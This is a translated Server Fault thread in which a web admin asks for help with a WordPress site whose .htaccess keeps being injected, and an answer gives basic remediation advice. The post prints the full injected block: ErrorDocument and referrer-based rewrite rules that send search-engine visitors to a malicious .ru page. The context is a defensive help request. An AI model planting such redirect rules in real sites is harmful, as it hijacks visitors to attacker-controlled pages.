Linux

wordpress .htaccess 文件被黑

  • September 29, 2011

我難住了。我的客戶 wordpress 網站不斷有其 .htaccess 文件被黑。它正在添加程式碼以將所有流量從搜尋引擎重定向到不同的站點。它不斷更改它重定向到的域。目前(請勿訪問此網站!prime-vermond.ru)

我已更改 ftp 密碼、wordpress 管理員密碼、更新所有外掛、刪除未使用的外掛、將 .htaccess 文件的文件權限更改為 444。

我在想這可能是伺服器漏洞?客戶網站由 godaddy 託管。我給他們發了幾次電子郵件,等待我最新的支持票的回复。

我已經對所有文件進行了搜尋,尋找其中可能包含惡意程式碼的內容,但一無所獲。我假設他們對程式碼進行了 base64 編碼並使用 eval 來執行它。

關於如何更好地找到修改後的壞文件的任何想法?我現在很茫然=/

下面是添加到 .htaccess 文件中的整個程式碼

ErrorDocument 400 http://prime-vermond.ru/trast/index.php                                                                                                                       
ErrorDocument 401 http://prime-vermond.ru/trast/index.php                                                                                                                       
ErrorDocument 403 http://prime-vermond.ru/trast/index.php                                                                                                                       
ErrorDocument 404 http://prime-vermond.ru/trast/index.php                                                                                                                       
ErrorDocument 500 http://prime-vermond.ru/trast/index.php                                                                                                                       
<IfModule mod_rewrite.c>                                                                                                                        
RewriteEngine On                                                                                                                        
RewriteCond %{HTTP_REFERER} .*google.* [OR]                                                                                                                     
RewriteCond %{HTTP_REFERER} .*ask.* [OR]                                                                                                                        
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]                                                                                                                      
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]                                                                                                                      
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]                                                                                                                        
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]                                                                                                                      
RewriteCond %{HTTP_REFERER} .*qq.* [OR]                                                                                                                     
RewriteCond %{HTTP_REFERER} .*excite.* [OR]                                                                                                                     
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]                                                                                                                      
RewriteCond %{HTTP_REFERER} .*msn.* [OR]                                                                                                                        
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]                                                                                                                       
RewriteCond %{HTTP_REFERER} .*aol.* [OR]                                                                                                                        
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]                                                                                                                     
RewriteCond %{HTTP_REFERER} .*goto.* [OR]                                                                                                                       
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]                                                                                                                       
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]                                                                                                                      
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]                                                                                                                      
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]                                                                                                                      
RewriteCond %{HTTP_REFERER} .*search.* [OR]                                                                                                                     
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]                                                                                                                        
RewriteCond %{HTTP_REFERER} .*bing.* [OR]                                                                                                                       
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]                                                                                                                        
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]                                                                                                                       
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]                                                                                                                        
RewriteCond %{HTTP_REFERER} .*blog.* [OR]                                                                                                                       
RewriteCond %{HTTP_REFERER} .*live.* [OR]                                                                                                                       
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]                                                                                                                        
RewriteCond %{HTTP_REFERER} .*mail.* [OR]                                                                                                                       
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]                                                                                                                     
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]                                                                                                                        
RewriteCond %{HTTP_REFERER} .*ya.* [OR]                                                                                                                     
RewriteCond %{HTTP_REFERER} .*aport.* [OR]                                                                                                                      
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]                                                                                                                       
RewriteCond %{HTTP_REFERER} .*flickr.*                                                                                                                      
RewriteRule ^(.*)$ http://prime-vermond.ru/trast/index.php [R=301,L]

您的應用程式碼正在被利用,或者有人通過網路釣魚/猜測您的帳戶憑據。確保您的 wp 程式碼是最新的,包括任何外掛,並確保您更改了帳戶密碼。

設置所有可能的日誌記錄選項。等待它再次發生。然後記下文件的最後修改時間,然後檢查訪問/錯誤日誌以查看當時是否發生任何異常情況。

引用自:https://serverfault.com/questions/316668